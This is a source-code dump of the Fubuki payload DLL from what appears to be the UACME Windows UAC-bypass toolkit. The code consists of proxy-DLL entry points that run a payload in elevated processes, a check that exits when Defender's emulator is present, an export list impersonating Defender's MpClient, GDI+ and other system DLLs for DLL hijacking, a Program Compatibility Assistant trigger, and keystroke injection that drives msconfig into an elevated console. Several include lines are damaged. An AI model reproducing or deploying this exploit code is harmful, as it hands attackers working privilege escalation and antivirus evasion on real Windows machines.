                hHook = SetWindowsHookEx(WH_CALLWNDPROC, HookProcedure, hinstDLL, 0);
                if (hHook) {
                    //
                    // Timeout to be enough to spawn target app.
                    //
                    Sleep(15000);
                    UnhookWindowsHookEx(hHook);
                }
            }
            RtlExitUserProcess(0);
        }
    }

    //
    // If target application name specified - check are we inside target app?
    //
    if (lpTargetApp) {
        if (_strcmpi(lpFileName, lpTargetApp) == 0) {
            DefaultPayload();
        }
    }
    else {
        //
        // Use any suitable elevated context.
        //
        if (ucmGetProcessElevationType(NULL, &TokenType)) {
            if (TokenType == TokenElevationTypeFull) {
                DefaultPayload();
            }
        }
    }
}

/*
* UiAccessMethodDllMain
*
* Purpose:
*
* Proxy dll entry point for uiAccess method.
* Need dedicated entry point because of additional code.
*
*/
BOOL WINAPI UiAccessMethodDllMain(
    _In_ HINSTANCE hinstDLL,
    _In_ DWORD fdwReason,
    _In_ LPVOID lpvReserved
)
{
    WCHAR szMMC[] = { L'm', L'm', L'c', L'.', L'e', L'x', L'e', 0 };

    UNREFERENCED_PARAMETER(lpvReserved);

    if (wdIsEmulatorPresent() != STATUS_NOT_SUPPORTED) {
        RtlExitUserProcess('foff');
    }

    if (fdwReason == DLL_PROCESS_ATTACH) {
        UiAccessMethodPayload(hinstDLL, TRUE, szMMC);
    }

    return TRUE;
}

/*
* DllMain
*
* Purpose:
*
* Default proxy dll entry point.
*
*/
BOOL WINAPI DllMain(
    _In_ HINSTANCE hinstDLL,
    _In_ DWORD fdwReason,
    _In_ LPVOID lpvReserved
)
{
    UNREFERENCED_PARAMETER(hinstDLL);
    UNREFERENCED_PARAMETER(lpvReserved);

    if (wdIsEmulatorPresent() != STATUS_NOT_SUPPORTED) {
        RtlExitUserProcess('foff');
    }

    if (fdwReason == DLL_PROCESS_ATTACH) {
        DefaultPayload();
    }

    return TRUE;
}

/*
* EntryPointExeMode
*
* Purpose:
*
* Entry point to be used in exe mode.
*
*/
VOID WINAPI EntryPointExeMode(
    VOID
)
{
    if (wdIsEmulatorPresent() != STATUS_NOT_SUPPORTED) {
        RtlExitUserProcess('foff');
    }

    DefaultPayload();
}

/*
* EntryPointUIAccessLoader
*
* Purpose:
*
* Entry point to be used in exe mode.
*
*/
VOID WINAPI EntryPointUIAccessLoader(
    VOID
)
{
    ULONG r = 0;
    WCHAR szParam[MAX_PATH * 2];

    if (wdIsEmulatorPresent() != STATUS_NOT_SUPPORTED) {
        RtlExitUserProcess('foff');
    }

    if (GetCommandLineParam(GetCommandLine(), 0, szParam, MAX_PATH, &r)) {
        if (r > 0) {
            ucmUIHackExecute(szParam);
        }
    }

    RtlExitUserProcess(0);
}

/*
* EntryPointUIAccessLoader2
*
* Purpose:
*
* Entry point to be used in exe mode.
*
*/
VOID WINAPI EntryPointUIAccessLoader2(
    VOID
)
{
    if (wdIsEmulatorPresent() != STATUS_NOT_SUPPORTED) {
        RtlExitUserProcess('foff');
    }

    ucmUIHackExecute2();

    RtlExitUserProcess(0);
}

/*
* EntryPointSxsConsent
*
* Purpose:
*
* Entry point to be used by consent sxs method.
*
*/
BOOL WINAPI EntryPointSxsConsent(
    _In_ HINSTANCE hinstDLL,
    _In_ DWORD fdwReason,
    _In_ LPVOID lpvReserved
)
{
    BOOL bSharedParamsReadOk;
    PWSTR lpParameter;
    ULONG cbParameter;

    UNREFERENCED_PARAMETER(lpvReserved);

    ucmDbgMsg(LoadedMsg);

    if (wdIsEmulatorPresent() != STATUS_NOT_SUPPORTED)
        RtlExitUserProcess('foff');

    if (fdwReason == DLL_PROCESS_ATTACH) {

        LdrDisableThreadCalloutsForDll(hinstDLL);

        //
        // Read shared params block.
        //
        RtlSecureZeroMemory(&g_SharedParams, sizeof(g_SharedParams));
        bSharedParamsReadOk = ucmReadSharedParameters(&g_SharedParams);
        if (bSharedParamsReadOk) {
            lpParameter = g_SharedParams.szParameter;
            cbParameter = (ULONG)(_strlen(g_SharedParams.szParameter) * sizeof(WCHAR));
        }
        else {
            lpParameter = NULL;
            cbParameter = 0UL;
        }

        ucmLaunchPayloadEx(
            CreateProcessW,
            lpParameter,
            cbParameter);

        //
        // Notify Akagi.
        //
        if (bSharedParamsReadOk) {
            ucmSetCompletion(g_SharedParams.szSignalObject);
        }
    }

    return TRUE;
}

/*
* EntryPointBackupLocked
*
* Purpose:
*
* Entry point to be used by QuickAssist method.
*
*/
BOOL WINAPI EntryPointBackupLocked(
    _In_ HINSTANCE hinstDLL,
    _In_ DWORD fdwReason,
    _In_ LPVOID lpvReserved
)
{
    BOOL bSharedParamsReadOk;
    PWSTR lpParameter;
    ULONG cbParameter;

    UNREFERENCED_PARAMETER(lpvReserved);

    ucmDbgMsg(LoadedMsg);

    if (wdIsEmulatorPresent() != STATUS_NOT_SUPPORTED)
        RtlExitUserProcess('foff');

    if (fdwReason == DLL_PROCESS_ATTACH) {

        ucmHideMainWindow();

        LdrDisableThreadCalloutsForDll(hinstDLL);

        //
        // Read shared params block.
        //
        RtlSecureZeroMemory(&g_SharedParams, sizeof(g_SharedParams));
        bSharedParamsReadOk = ucmReadSharedParameters(&g_SharedParams);
        if (bSharedParamsReadOk) {
            lpParameter = g_SharedParams.szParameter;
            cbParameter = (ULONG)(_strlen(g_SharedParams.szParameter) * sizeof(WCHAR));
        }
        else {
            lpParameter = NULL;
            cbParameter = 0UL;
        }

        ucmLaunchPayload3(lpParameter, cbParameter);

        //
        // Notify Akagi.
        //
        if (bSharedParamsReadOk) {
            ucmSetCompletion(g_SharedParams.szSignalObject);
        }
    }

    return TRUE;
}

================================================
FILE: Source/Fubuki/export.def
================================================
EXPORTS
    ;DllRegisterServer = DummyFunc PRIVATE

    ; WOW64LOG
    Wow64LogSystemService = DummyFunc
    Wow64LogInitialize = DummyFunc
    Wow64LogTerminate = DummyFunc
    Wow64LogMessageArgList = DummyFunc

    ; COMMCTL
    TaskDialogIndirect = DummyFunc @345

    ; Main routines
    MpManagerOpen = UiAccessMethodDllMain
    MpHandleClose = UiAccessMethodHookProc
    MpScanStart = EntryPointExeMode
    MpScanControl = EntryPointUIAccessLoader
    MpUpdateEngine = EntryPointUIAccessLoader2
    MpThreatOpen = EntryPointSxsConsent
    MpThreatEnumerate = EntryPointBackupLocked
    MpManagerStatusQuery = pcaEntryPointLoader
    MpManagerStatusQueryEx = pcaEntryPointDll

    ; MSCOREE.DLL
    ClrCreateManagedInstance = DummyFunc
    CorBindToRuntimeEx = DummyFunc
    LoadLibraryShim = DummyFunc

    ; OSKSUPPORT.DLL
    InitializeOSKSupport = DummyFunc
    UninitializeOSKSupport = DummyFunc

    ; DUSER.DLL
    InvalidateGadget = DummyFunc

    ; GDIPLUS
    GdipAlloc = DummyFunc
    GdipCloneImage = DummyFunc
    GdipCreateBitmapFromStream = DummyFunc
    GdipCreateFromHDC = DummyFunc
    GdipCreateHBITMAPFromBitmap = DummyFunc
    GdipCreateLineBrushI = DummyFunc
    GdipCreateSolidFill = DummyFunc
    GdipDeleteBrush = DummyFunc
    GdipDeleteGraphics = DummyFunc
    GdipDisposeImage = DummyFunc
    GdipFillRectangleI = DummyFunc
    GdipFree = DummyFunc
    GdiplusShutdown = DummyFunc
    GdiplusStartup = DummyFunc

    ; WDI
    WdiDiagnosticModuleMain = WdiStubGeneric
    WdiHandleInstance = WdiStubGeneric
    WdiGetDiagnosticModuleInterfaceVersion

    ; Rest of exports
    MpManagerDisable = DummyFunc
    MpManagerEnable = DummyFunc
    MpManagerVersionQuery = DummyFunc
    MpMemoryScanStart = DummyFunc
    MpGetEngineVersion = DummyFunc

    ; ISCSIEXE.DLL
    SvchostPushServiceGlobals = DummyFunc
    DiscpEstablishServiceLinkage = DummyFunc
    ServiceMain = DummyFunc

================================================
FILE: Source/Fubuki/fubuki.h
================================================
/*******************************************************************************
*
*  (C) COPYRIGHT AUTHORS, 2018 - 2023
*
*  TITLE:       FUBUKI.H
*
*  VERSION:     3.64
*
*  DATE:        04 Feb 2023
*
*  Fubuki global include header file.
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
* PARTICULAR PURPOSE.
*
*******************************************************************************/
#pragma once

#if !defined UNICODE
#error ANSI build is not supported
#endif

#include "shared\shared.h"
#include "shared\libinc.h"
#include "shared\cmdline.h"
#include "uihacks.h"
#include "pca.h"

//
// Forwards
//
#include "winmm.h"
#include "atldll.h"

#define LoadedMsg TEXT("Fubuki lock and loaded")

//default execution flow
#define AKAGI_FLAG_KILO 1
//suppress all additional output
#define AKAGI_FLAG_TANGO 2

extern UACME_PARAM_BLOCK g_SharedParams;

================================================
FILE: Source/Fubuki/pca.c
================================================
/*******************************************************************************
*
*  (C) COPYRIGHT AUTHORS, 2021 - 2025
*
*  TITLE:       PCA.C
*
*  VERSION:     3.69
*
*  DATE:        07 July 2025
*
*  Fubuki Program Compatibility Assistant method support code.
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
* PARTICULAR PURPOSE.
*
*******************************************************************************/
#include "fubuki.h"
#include   // system header name lost in extraction (angle-bracket include)
#include   // system header name lost in extraction (angle-bracket include)
#include   // system header name lost in extraction (angle-bracket include)
#pragma comment(lib, "taskschd.lib")

const ULONGLONG ZERO_VALUE = 0;

/*
* WdiGetDiagnosticModuleInterfaceVersion
*
* Purpose:
*
* Stub for fake WDI exports.
*
*/
ULONG_PTR WINAPI WdiGetDiagnosticModuleInterfaceVersion(
    VOID
)
{
    return 1;
}

/*
* WdiStubGeneric
*
* Purpose:
*
* Stub for fake WDI exports.
*
*/
HRESULT WINAPI WdiStubGeneric(
    ULONG_PTR UnusedParam1,
    ULONG_PTR UnusedParam2
)
{
    UNREFERENCED_PARAMETER(UnusedParam1);
    UNREFERENCED_PARAMETER(UnusedParam2);
    return S_OK;
}

/*
* ucmxStopTaskByName
*
* Purpose:
*
* Stop scheduled task by name.
*
*/
BOOL ucmxStopTaskByName(
    _In_ LPCWSTR TaskFolder,
    _In_ LPCWSTR TaskName
)
{
    BOOL bResult = FALSE;
    HRESULT hr;
    ITaskService* pService = NULL;
    ITaskFolder* pRootFolder = NULL;
    IRegisteredTask* pTask = NULL;
    TASK_STATE taskState;
    BSTR bstrTaskFolder = NULL;
    BSTR bstrTask = NULL;
    VARIANT varDummy;

    do {

        bstrTaskFolder = SysAllocString(TaskFolder);
        if (bstrTaskFolder == NULL)
            break;

        bstrTask = SysAllocString(TaskName);
        if (bstrTask == NULL)
            break;

        hr = CoCreateInstance(&CLSID_TaskScheduler,
            NULL,
            CLSCTX_INPROC_SERVER,
            &IID_ITaskService,
            (void**)&pService);

        if (FAILED(hr))
            break;

        VariantInit(&varDummy);

        hr = pService->lpVtbl->Connect(pService, varDummy, varDummy, varDummy, varDummy);
        if (FAILED(hr))
            break;

        hr = pService->lpVtbl->GetFolder(pService, bstrTaskFolder, &pRootFolder);
        if (FAILED(hr))
            break;

        hr = pRootFolder->lpVtbl->GetTask(pRootFolder, bstrTask, &pTask);
        if (FAILED(hr))
            break;

        hr = pTask->lpVtbl->get_State(pTask, &taskState);
        if (FAILED(hr))
            break;

        if (taskState == TASK_STATE_RUNNING) {
            hr = pTask->lpVtbl->Stop(pTask, 0);
        }

        bResult = SUCCEEDED(hr);

    } while (FALSE);

    if (bstrTaskFolder) SysFreeString(bstrTaskFolder);
    if (bstrTask) SysFreeString(bstrTask);
    if (pTask) pTask->lpVtbl->Release(pTask);
    if (pRootFolder) pRootFolder->lpVtbl->Release(pRootFolder);
    if (pService) pService->lpVtbl->Release(pService);

    return bResult;
}

/*
* pcaEtwCall
*
* Purpose:
*
* Write ETW events to trigger the PCA process.
*
*/
ULONG pcaEtwCall()
{
    CONST GUID providerGuid = { 0x0EEF54E71, 0x661, 0x422D, {0x9A, 0x98, 0x82, 0xFD, 0x49, 0x40, 0xB8, 0x20} };
    CONST EVENT_DATA_DESCRIPTOR eventUserData[3] = {
        {(UINT_PTR)&ZERO_VALUE, sizeof(ULONG)},
        {(UINT_PTR)&ZERO_VALUE, sizeof(ULONG)},
        {(UINT_PTR)NULL, 0}
    };
    EVENT_DESCRIPTOR eventDescriptor;
    ULONG status = 0;

    eventDescriptor.Id = 0x1F46;
    eventDescriptor.Version = 0;
    eventDescriptor.Channel = 0x11;
    eventDescriptor.Level = 4;
    eventDescriptor.Opcode = 0;
    eventDescriptor.Task = 0;
    eventDescriptor.Keyword = 0x4000000000000100;

    status = EtwEventWriteNoRegistration(
        &providerGuid,
        &eventDescriptor,
        3,
        (PEVENT_DATA_DESCRIPTOR)&eventUserData);

    if (status == ERROR_SUCCESS) {
        eventDescriptor.Id = 0x1F48;
        status = EtwEventWriteNoRegistration(
            &providerGuid,
            &eventDescriptor,
            3,
            (PEVENT_DATA_DESCRIPTOR)&eventUserData);
    }

    return status;
}

/*
* pcaStopWDI
*
* Purpose:
*
* Stop WDI task and exit loader.
*
*/
ULONG pcaStopWDI()
{
    HRESULT hr;
    NTSTATUS ntStatus = STATUS_UNSUCCESSFUL;

    ucmDbgMsg(L"[PCALDR] pcaStopWDI\r\n");

    hr = CoInitializeEx(NULL,
        COINIT_APARTMENTTHREADED | COINIT_DISABLE_OLE1DDE | COINIT_SPEED_OVER_MEMORY);

    if (SUCCEEDED(hr)) {

        ucmSleep(1000);

        if (ucmxStopTaskByName(
            TEXT("Microsoft\\Windows\\WDI"),
            TEXT("ResolutionHost")))
        {
            ucmDbgMsg(L"[PCALDR] ucmxStopTaskByName success\r\n");
            ntStatus = STATUS_SUCCESS;
        }

        CoUninitialize();
    }

    return ntStatus;
}

/*
* pcaWin7Trigger
*
* Purpose:
*
* PCA Windows 7 specific trigger method.
*
*/
ULONG pcaWin7Trigger(
    VOID
)
{
    ucmSleep(2000);
    return 0;
}

/*
* pcaEntryPointLoader
*
* Purpose:
*
* Entry point to be used in exe mode with PCA method ONLY.
*
*/
VOID WINAPI pcaEntryPointLoader(
    VOID)
{
    ULONG rLen = 0, status = 0;
    LPCWSTR lpCmdline = GetCommandLine();
    WCHAR szLoaderParam[MAX_PATH + 1];

    if (wdIsEmulatorPresent() != STATUS_NOT_SUPPORTED) {
        RtlExitUserProcess('foff');
    }

    RtlSecureZeroMemory(szLoaderParam, sizeof(szLoaderParam));
    GetCommandLineParam(lpCmdline, 0, (LPWSTR)&szLoaderParam, MAX_PATH, &rLen);
    if (rLen) {
        if (szLoaderParam[0] == TEXT('1')) {
            status = pcaEtwCall();
        }
        else if (szLoaderParam[0] == TEXT('2')) {
            status = pcaStopWDI();
        }
        else if (szLoaderParam[0] == TEXT('3')) {
            status = pcaWin7Trigger();
        }
    }
    else {
        ucmDbgMsg(L"[PCALDR] Empty command line\r\n");
    }

    RtlExitUserProcess(status);
}

/*
* pcaEntryPointDll
*
* Purpose:
*
* Entry point to be used in dll mode with PCA method ONLY.
*
*/
BOOL WINAPI pcaEntryPointDll(
    _In_ HINSTANCE hinstDLL,
    _In_ DWORD fdwReason,
    _In_ LPVOID lpvReserved
)
{
    BOOL bSharedParamsReadOk;
    PWSTR lpParameter;
    ULONG cbParameter;
    HANDLE hSharedSection = NULL;
    PCA_LOADER_BLOCK* pvLoaderBlock = NULL;
    NTSTATUS ntStatus;
    SIZE_T viewSize = PAGE_SIZE;
    HANDLE hSharedEvent = NULL;
    WCHAR szObjectName[MAX_PATH];
    WCHAR szName[128];
    WCHAR szLoaderCmdLine[2];
    WCHAR szLoader[MAX_PATH + 1];
    UNICODE_STRING usName;
    OBJECT_ATTRIBUTES obja;
    PROCESS_INFORMATION processInfo;
    STARTUPINFO startupInfo;

    UNREFERENCED_PARAMETER(lpvReserved);

    if (wdIsEmulatorPresent() != STATUS_NOT_SUPPORTED) {
        RtlExitUserProcess('f0ff');
    }

    if (fdwReason == DLL_PROCESS_ATTACH) {

        LdrDisableThreadCalloutsForDll(hinstDLL);

        ucmDbgMsg(L"[PCADLL] Entry\r\n");

        RtlSecureZeroMemory(&szName, sizeof(szName));
        ucmGenerateSharedObjectName(FUBUKI_PCA_SECTION_ID, szName);

        _strcpy(szObjectName, TEXT("\\Sessions\\"));
        ultostr(NtCurrentPeb()->SessionId, _strend(szObjectName));
        _strcat(szObjectName, TEXT("\\BaseNamedObjects\\"));
        _strcat(szObjectName, szName);

        RtlInitUnicodeString(&usName, szObjectName);
        InitializeObjectAttributes(&obja, &usName, OBJ_CASE_INSENSITIVE, NULL, NULL);

        if (NT_SUCCESS(NtOpenSection(&hSharedSection,
            SECTION_ALL_ACCESS,
            &obja)))
        {
            ntStatus = NtMapViewOfSection(
                hSharedSection,
                NtCurrentProcess(),
                &pvLoaderBlock,
                0,
                PAGE_SIZE,
                NULL,
                &viewSize,
                ViewUnmap,
                MEM_TOP_DOWN,
                PAGE_READWRITE);

            if (NT_SUCCESS(ntStatus) && pvLoaderBlock && viewSize >= sizeof(PCA_LOADER_BLOCK)) {

                RtlSecureZeroMemory(&szLoader, sizeof(szLoader));
                _strncpy(szLoader, MAX_PATH, pvLoaderBlock->szLoader, MAX_PATH);

                ucmDbgMsg(L"[PCADLL] NtMapViewOfSection success\r\n");

                RtlSecureZeroMemory(&szName, sizeof(szName));
                _strcpy(szObjectName, L"\\BaseNamedObjects\\");
                ucmGenerateSharedObjectName(FUBUKI_PCA_EVENT_ID, szName);
                _strcat(szObjectName, szName);

                RtlInitUnicodeString(&usName, szObjectName);
                InitializeObjectAttributes(&obja, &usName, OBJ_CASE_INSENSITIVE, NULL, NULL);

                if (NT_SUCCESS(NtOpenEvent(&hSharedEvent,
                    EVENT_MODIFY_STATE,
                    &obja)))
                {
                    //
                    // Read shared params block.
                    //
                    RtlSecureZeroMemory(&g_SharedParams, sizeof(g_SharedParams));
                    bSharedParamsReadOk = ucmReadSharedParameters(&g_SharedParams);
                    if (bSharedParamsReadOk) {
                        ucmDbgMsg(L"[PCADLL] Shared parameters read OK\r\n");
                        lpParameter = g_SharedParams.szParameter;
                        cbParameter = (ULONG)(_strlen(g_SharedParams.szParameter) * sizeof(WCHAR));
                    }
                    else {
                        ucmDbgMsg(L"[PCADLL] Shared parameters defaulted\r\n");
                        lpParameter = NULL;
                        cbParameter = 0UL;
                    }

                    //
                    // Reset windir environment variable.
                    //
                    ucmSetEnvironmentVariable(T_WINDIR, USER_SHARED_DATA->NtSystemRoot);

                    //
                    // Run payload.
                    //
                    if (ucmLaunchPayload(lpParameter, cbParameter)) {
                        ucmDbgMsg(L"[PCADLL] Payload executed OK\r\n");
                        pvLoaderBlock->OpResult = FUBUKI_PCA_PAYLOAD_RUN;
                    }
                    else {
                        ucmDbgMsg(L"[PCADLL] Error during payload execution\r\n");
                    }

                    //
                    // Restart loader with "2" param.
                    //
                    RtlSecureZeroMemory(&startupInfo, sizeof(startupInfo));
                    startupInfo.cb = sizeof(startupInfo);

                    //
                    // Set loader command line.
                    //
                    szLoaderCmdLine[0] = TEXT('2');
                    szLoaderCmdLine[1] = 0;

                    if (CreateProcess(
                        szLoader,
                        szLoaderCmdLine,
                        NULL,
                        NULL,
                        FALSE,
                        CREATE_NO_WINDOW,
                        NULL,
                        NULL,
                        &startupInfo,
                        &processInfo))
                    {
                        ucmDbgMsg(L"[PCADLL] Loader run OK\r\n");
                        CloseHandle(processInfo.hThread);
                        CloseHandle(processInfo.hProcess);
                        pvLoaderBlock->OpResult |= FUBUKI_PCA_LOADER_RUN;
                    }
                    else {
                        ucmDbgMsg(L"[PCADLL] Error during loader execution\r\n");
                    }

                    NtSetEvent(hSharedEvent, NULL);
                    NtClose(hSharedEvent);
                    ucmDbgMsg(L"[PCADLL] Shared event signaled\r\n");

                    //
                    // Notify Akagi.
                    //
                    if (bSharedParamsReadOk) {
                        ucmSetCompletion(g_SharedParams.szSignalObject);
                    }
                }
                else {
                    ucmDbgMsg(L"[PCADLL] NtOpenEvent failed\r\n");
                }

                NtUnmapViewOfSection(NtCurrentProcess(), pvLoaderBlock);
            }
            else {
                ucmDbgMsg(L"[PCADLL] MapViewOfFile failed\r\n");
            }

            NtClose(hSharedSection);
        }
        else {
            ucmDbgMsg(L"[PCADLL] OpenFileMapping failed\r\n");
        }
    }

    return TRUE;
}

================================================
FILE: Source/Fubuki/pca.h
================================================
/*******************************************************************************
*
*  (C) COPYRIGHT AUTHORS, 2021
*
*  TITLE:       PCA.H
*
*  VERSION:     3.56
*
*  DATE:        19 July 2021
*
*  Fubuki Program Compatibility Assistant related code header file.
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
* PARTICULAR PURPOSE.
*
*******************************************************************************/
#pragma once

typedef struct _PCA_LOADER_BLOCK {
    ULONG OpResult;
    WCHAR szLoader[MAX_PATH + 1];
} PCA_LOADER_BLOCK, * PPCA_LOADER_BLOCK;

================================================
FILE: Source/Fubuki/resource.h
================================================
//{{NO_DEPENDENCIES}}
// Microsoft Visual C++ generated include file.
// Used by version.rc
//
// Next default values for new objects
//
#ifdef APSTUDIO_INVOKED
#ifndef APSTUDIO_READONLY_SYMBOLS
#define _APS_NEXT_RESOURCE_VALUE        103
#define _APS_NEXT_COMMAND_VALUE         40001
#define _APS_NEXT_CONTROL_VALUE         1001
#define _APS_NEXT_SYMED_VALUE           101
#endif
#endif

================================================
FILE: Source/Fubuki/uihacks.c
================================================
/*******************************************************************************
*
*  (C) COPYRIGHT AUTHORS, 2019 - 2025
*
*  TITLE:       UIHACKS.C
*
*  VERSION:     3.69
*
*  DATE:        07 Jul 2025
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
* PARTICULAR PURPOSE.
*
*******************************************************************************/
#include "fubuki.h"

//#define FUBUKI_TRACE_CALL

#ifdef FUBUKI_TRACE_CALL
VOID ucmxSendInput(
    _In_ UINT cInputs,
    _In_reads_(cInputs) LPINPUT pInputs,
    _In_ int cbSize)
{
    WCHAR szOut[200];
    UINT r = SendInput(cInputs, pInputs, cbSize);
    _strcpy(szOut, L"SendInput = ");
    ultostr(r, _strend(szOut));
    _strcat(szOut, L" GetLastError = ");
    ultostr(GetLastError(), _strend(szOut));
    _strcat(szOut, L"\r\n");
    OutputDebugString(szOut);
}
#else
#define ucmxSendInput SendInput
#endif

/*
* ucmxSendControlInput
*
* Purpose:
*
* Send keyboard input to the foreground window with optional shift key.
*
*/
VOID ucmxSendControlInput(
    _In_ WORD VkKey,
    _In_ BOOL UseShift)
{
    INPUT ip;

    ip.type = INPUT_KEYBOARD;
    ip.ki.wScan = 0;
    ip.ki.time = 0;
    ip.ki.dwExtraInfo = 0;
    ip.ki.dwFlags = 0;

    if (UseShift) {
        ip.ki.wVk = VK_LSHIFT;
        ucmxSendInput(1, &ip, sizeof(INPUT));
    }

    ip.ki.wVk = VkKey;
    ucmxSendInput(1, &ip, sizeof(INPUT));

    ip.ki.dwFlags = KEYEVENTF_KEYUP;
    ucmxSendInput(1, &ip, sizeof(INPUT));

    if (UseShift) {
        ip.ki.wVk = VK_LSHIFT;
        ip.ki.dwFlags = KEYEVENTF_KEYUP;
        ucmxSendInput(1, &ip, sizeof(INPUT));
    }
}

/*
* ucmxSendKeys
*
* Purpose:
*
* Send a sequence of keystrokes to the foreground window.
*
*/
VOID ucmxSendKeys(
    _In_ LPWSTR lpString)
{
    BOOL NeedShift;
    SIZE_T i;
    WORD VkAndShift;
    HKL kl = LoadKeyboardLayout(TEXT("en-US"), KLF_ACTIVATE);

    for (i = 0; i < _strlen(lpString); i++) {
        VkAndShift = VkKeyScanEx(lpString[i], kl);
        NeedShift = ((HIBYTE(VkAndShift) & 1) == 1);
        ucmxSendControlInput(LOBYTE(VkAndShift), NeedShift);
    }
}

/*
* ucmxElevatedConsoleCallback
*
* Purpose:
*
* Callback used to locate window of elevated console.
*
*/
BOOL CALLBACK ucmxElevatedConsoleCallback(
    _In_ HWND hwnd,
    _In_ LPARAM lParam
)
{
    BOOL Elevated = FALSE;
    DWORD dwPid;
    LPWSTR lpPayload = (LPWSTR)lParam;
    WCHAR szBuffer[MAX_PATH + 1];

    if (GetClassName(hwnd, (LPWSTR)szBuffer, MAX_PATH)) {
        if (_strcmpi(szBuffer, TEXT("ConsoleWindowClass")) == 0) {
            if (GetWindowThreadProcessId(hwnd, &dwPid)) {
                if (NT_SUCCESS(ucmIsProcessElevated(dwPid, &Elevated))) {
                    if (Elevated) {
                        ucmxSendKeys(lpPayload);
                        ucmxSendControlInput(VK_RETURN, FALSE);
                        return TRUE;
                    }
                }
            }
        }
    }

    return FALSE;
}

/*
* ucmxEnumChildCallback
*
* Purpose:
*
* EnumChildWindows callback used to send keys to msconfig and cmd.
*
*/
BOOL CALLBACK ucmxEnumChildCallback(
    _In_ HWND hwnd,
    _In_ LPARAM lParam
)
{
    UINT i;
    HWND hwndButton, hwndList;

    //
    // Find msconfig tools listview.
    //
    hwndList = FindWindowEx(hwnd, NULL, TEXT("SysListView32"), TEXT("List1"));
    if (hwndList) {

        //SetFocus(hwndList);

        //
        // Navigate to cmd.exe entry in msconfig listview.
        //
        for (i = 0; i < 14; i++) {
            ucmxSendControlInput(VK_DOWN, FALSE);
        }

        hwndButton = GetDlgItem(hwnd, 302);
        if (hwndButton == NULL)
            hwndButton = GetDlgItem(hwnd, 1117);

        if (hwndButton) {

            //
            // Navigate to "Launch" button.
            //
            ucmxSendControlInput(VK_TAB, FALSE);
            ucmxSendControlInput(VK_TAB, FALSE);

            //
            // Press "Launch" button.
            //
            ucmxSendControlInput(VK_RETURN, FALSE);

            Sleep(1000);

            //
            // Send input to elevated console.
            //
            ucmxElevatedConsoleCallback(GetForegroundWindow(), lParam);

            return FALSE;
        }
#ifdef FUBUKI_TRACE_CALL
        else {
            OutputDebugString(L"GetDlgItem(BUTTON) failed\r\n");
        }
#endif
    }

    return TRUE;
}

/*
* ucmxFindMainMsConfigWindow
*
* Purpose:
*
* EnumWindows callback used to locate msconfig dialog window.
*
*/
BOOL CALLBACK ucmxFindMainMsConfigWindow(
    _In_ HWND hwnd,
    _In_ LPARAM lParam
)
{
    PSEARCH_WND SearchWnd = (PSEARCH_WND)lParam;
    WCHAR szClassName[MAX_PATH * 2];
    DWORD dwPid;
    DWORD dwTargetPid = SearchWnd->ProcessId;

    GetWindowThreadProcessId(hwnd, &dwPid);
    if (dwPid == dwTargetPid) {
        if (GetClassName(hwnd, szClassName, MAX_PATH)) {
            if (_strcmpi(szClassName, TEXT("#32770")) == 0) {
                SearchWnd->hWnd = hwnd;
                return FALSE;
            }
        }
    }

    return TRUE;
}

/*
* ucmxGetHwndForMsConfig
*
* Purpose:
*
* Return dialog hwnd of msconfig.
*
*/
HWND ucmxGetHwndForMsConfig(
    _In_ ULONG ProcessId
)
{
    SEARCH_WND SearchWnd;

    SearchWnd.ProcessId = ProcessId;
    SearchWnd.hWnd = NULL;

    if (!EnumWindows(ucmxFindMainMsConfigWindow, (LPARAM)&SearchWnd)) {
        return SearchWnd.hWnd;
    }

    return NULL;
}

/*
* ucmUIHackExecute
*
* Purpose:
*
* Force msconfig to spawn elevated cmd copy via gui-hack and gui-hack it too.
*
*/
VOID ucmUIHackExecute(
    _In_ LPWSTR lpPayload
)
{
    HWND hwndDlg;
    SHELLEXECUTEINFO shinfo;
    PROCESS_BASIC_INFORMATION pbi;
    WCHAR szBuffer[MAX_PATH * 2];

    _strcpy(szBuffer, USER_SHARED_DATA->NtSystemRoot);
    _strcat(szBuffer, SYSTEM32_DIR);
    _strcat(szBuffer, MSCONFIG_EXE);

    RtlSecureZeroMemory(&shinfo, sizeof(shinfo));
    shinfo.cbSize = sizeof(shinfo);
    shinfo.fMask = SEE_MASK_NOCLOSEPROCESS;
    shinfo.lpFile = szBuffer;
    shinfo.lpParameters = TEXT("-5");
    shinfo.nShow = SW_SHOW;

    if (ShellExecuteEx(&shinfo)) {

        RtlSecureZeroMemory(&pbi, sizeof(PROCESS_BASIC_INFORMATION));

        if (NT_SUCCESS(NtQueryInformationProcess(shinfo.hProcess,
            ProcessBasicInformation,
            (PVOID)&pbi,
            sizeof(PROCESS_BASIC_INFORMATION),
            NULL)))
        {
            Sleep(1000);

            hwndDlg = ucmxGetHwndForMsConfig((ULONG)pbi.UniqueProcessId);
            if (hwndDlg) {
                EnumChildWindows(hwndDlg, ucmxEnumChildCallback, (LPARAM)lpPayload);
            }
        }

        TerminateProcess(shinfo.hProcess, 0);
        CloseHandle(shinfo.hProcess);
    }
}

/*
* ucmUIHackExecute2
*
* Purpose:
*
* GUI hack target program via sending F1 key.
*
*/
VOID ucmUIHackExecute2(
    VOID
)
{
    INPUT ip;
    ULONG iRetry = 5;
    SHELLEXECUTEINFO shinfo;
    WCHAR szBuffer[MAX_PATH * 2];
    HWND hwnd;

    _strcpy(szBuffer, USER_SHARED_DATA->NtSystemRoot);
    _strcat(szBuffer, SYSTEM32_DIR);
    _strcat(szBuffer, MMC_EXE);

    RtlSecureZeroMemory(&shinfo, sizeof(shinfo));
    shinfo.cbSize = sizeof(shinfo);
    shinfo.fMask = SEE_MASK_NOCLOSEPROCESS;
    shinfo.lpFile = szBuffer;
